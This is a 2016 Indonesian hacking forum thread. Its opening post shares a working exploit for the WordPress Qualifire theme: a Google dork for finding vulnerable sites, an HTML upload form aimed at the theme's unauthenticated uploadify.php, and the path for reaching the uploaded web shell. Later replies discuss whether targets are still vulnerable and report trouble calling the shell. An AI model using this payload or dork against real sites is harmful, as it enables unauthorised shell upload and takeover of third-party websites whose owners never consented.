Exploit WordPress Qualifire Themes

by Nue Bhandell - 03-22-2016 at 11:54 AM
Staff
Moderators
Posts:
45
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#1
OP
Posted: 03-22-2016, 11:54 AM
Malam Gengs, *nyari bug mulu, kapan nyari pacarnya  :D :D :D
iseng2 share exploit lama, kali aja masih crotz awkakw.

yg dh master minggir dlu beb [Image: heart.png] 


Play with Me , Baby [Image: tongue.png] 

Dork :
inurl:"/wp-content/themes/qualifire"

Vuln? biasanya Blank putih atau muncul angka/huruf gak jelas , tapi kalo 404 not found berarti ikhlasin aja hehehe

[Image: fVtRWaq.png]

Copy Script Upload CSRF:
<form
action="http://target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>


lalu tinggal upload file/shell ente.
kalo berhasil muncul angka 1

[Image: f8WW5zW.png]

Shell/file Akses: http://www.target.co.li/filemumas

semoga bermanfaat Gengs, maap kalo post cupu  [Image: smile.png] 
waktunya Nue dan tim Katakan Putus cabut dulu gengs, karna bsk dah UAS awkakw  [Image: cool.png] 

Bye



SUMUR
Reply
Find Posts
Junior Member
Posts:
37
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#2
Posted: 03-22-2016, 12:50 PM
masih ada aja yang vuln gan ? >_<
Reply
Find Posts
Staff
Moderators
Posts:
45
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#3
OP
Posted: 03-22-2016, 01:52 PM
(03-22-2016, 12:50 PM)./EL-Mueeza_23 Wrote: masih ada aja yang vuln gan ? >_<

vuln , tapi gak verawan bang  :D
Reply
Find Posts
Junior Member
Posts:
13
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#4
Posted: 05-28-2016, 03:04 PM
scan vlun pake apaan om biasanya ?
Reply
Find Posts
Junior Member
Posts:
4
Joined:
Jun 2016
Likes:
0
Reputation:
0
2 Year Of Member
#5
Posted: 06-01-2016, 05:58 AM
vuln tapi Invalid.. :D
Reply
Find Posts
Junior Member
Posts:
7
Joined:
May 2016
Likes:
0
Reputation:
0
2 Year Of Member
#6
Posted: 06-01-2016, 10:21 PM
tadi dapet yang VULN cuman pas manggil shell malah gak muncul :v dapet notice error
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.